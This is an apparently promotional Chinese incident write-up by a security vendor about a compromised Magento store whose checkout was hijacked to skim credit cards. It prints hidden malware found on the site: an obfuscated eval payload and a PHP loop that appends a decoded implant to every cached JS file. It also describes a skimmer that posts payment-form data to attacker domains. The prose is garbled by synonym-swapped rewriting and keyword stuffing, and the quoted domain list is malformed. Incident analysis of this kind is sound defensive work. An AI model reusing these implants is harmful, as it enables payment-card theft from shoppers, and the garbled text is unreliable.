网络ip地址查询-Magento外贸网站被入侵支付被劫持跳转怎么处理
Magento是最受欢迎的外贸电商结构之一,许多企业已经在其基础上进行了二次开发。但是,关于运用2.x版别的老体系来说,安全问题也成为了一大难题。有些客户在找咱们SINESAFE做网站安全服务之前,客户也找过建站的公司去清除后门,建站公司也将体系迁移晋级到了最新的2.4.4版别,但后来发现问题并没有彻底的解决,仍是会反复的被篡改代码和用户的付出页面被劫持跳转,问题的根源是代码里已经被黑客植入后门了,数据库也被留了木马病毒,这个时候不光是要晋级magento到最新版别,还得要把木马后门给彻底的整理掉,做好安全加固和防护,才能彻底的解决这个问题。
因为2022年以前的Maganto 2.x版别存在许多缝隙,像长途代码执行缝隙、SQL注入缝隙都是比较高危的,如果不及时晋级到2.x版别就很简单被黑客进犯。但是,即使晋级到2.x版别,也不代表彻底解决了安全问题。因此,针对这种情况,企业需求仔细评估自身的安全危险,并采纳办法进行安全加固。具体来说,能够经过加强拜访操控、强化数据保护等方式来进步体系安全性。一起,定期对体系进行缝隙扫描和代码安全审计,及时修补代码缝隙和加强网站的安全防护,也是减轻安全危险的有用办法。
咱们SINE安全处理了许多外贸客户运用magento被黑客侵略的安全问题,尽管在网络ip地址查询国内Magento并不被广泛运用,但它在国外却十分盛行。但是,一些老版别的Magento很简单被进犯者经过结构拿shell等方式侵略。以下便是咱们SINE安全处理客户的magento被黑客进犯的进程记载:
排查黑客进犯的问题时,很简单陷入只剖析日志等细节的误区。其实,在进行任何剖析之前,咱们都需求先做以下几件工作:
榜首,核实信息。这就像是咱们在找错问题之前,需求先了解出现问题的具体细节和当时服务器的环境情况。
第二,断开服务器的外网链接,保障安全。这就像是把自家的大门关上,不让坏人轻松进入。
第三,保存服务器的环境,以及现场的各种信息,如端口网络、应用程序、日志文件等。这样,就像是在证据链中留下关键的头绪,更有利于咱们查找和剖析问题,而且要注意不要有写操作哦!
在现场环境中,尽管咱们或许无法找到确切的问题所在,但是能够经过检查前史日志,来检查是否存在服务器linux体系被提权等可疑行为。如果运用了chkrootkit、rkthunter和lynis等安全扫描工具,也未发现任何问题,那仍是主张客户考虑替换服务器,以避免潜在的安全危险。
咱们SINE安全首先从web层面去看,剖析了网站拜访日志,nginx日志,数据库日志发现有许多黑客进犯的痕迹,利用的都是Magento的一些高危缝隙进行的,也能够说明网站被侵略是由于magento低版别存在缝隙导致,咱们立即展开对体系以及源代码的安全审计,人工去剖析每一行代码,经过咱们的检测,发现4个木马后门,如下:
bmMo\1122\x46jdGl\x76bicgLi\101kX1BP\x551R\x62\1122\105\x6e\x58\123k7CmV4aXQ7Cg=\075″; eval(_decode($VKGPOZ)); ?>
foreach (glob(“/www/wwwroot/dev.******.com/pub/static/_cache/merged/*.js”) as $filename) {
if (!preg_match(“/lG68xv3NXN/”, file_get_contents($filename))) {
file_put_contents($filename, _decode($implant), FILE_APPEND);
echo “updated: {$filename}\n”;
} else {
echo “ok: {$filename}\n”;
}
}
经过上面的代码咱们能够发现都是一些webshell木马后门,像filemanPHP大马,一句话木马,以及定时篡改网站悉数JS功用的代码,经过剖析,咱们SINE安全发现黑客侵略的意图不是为了挂马和挂黑链,而是为了盗取用户的信用卡信息,用于盗刷。咱们对黑客植入到JS的代码进行了剖析与解密,发现该JS代码是用来记载用户的信用卡信息,针对Magento付出相关页面(onepage|checkout|onestep|payment|transaction)中所有的表单信息,也会判别来路是从
const domains =[“securecode.com”,”psncdn.com”,”googleadservices.com”,”googletagmanager.com”,”google.com”];”apprater.net”,”shopperapproved.com”,”chromecast-setup.com”,”ssl-images-amazon.com”,”google.com”];的用户,会将信用卡的信息POST发送到黑客的指定网站上。
看来黑客的意图便是为了要盗取用户的信用卡信息,用于盗刷来获取巨大的利益。道高一尺魔高一丈,咱们SINE安全十多年来一直与黑灰产进行对立,经过此次帮客户处理的magento的安全问题,咱们又总结了新的经历,也希望共享这个处理进程让大家有所收成。
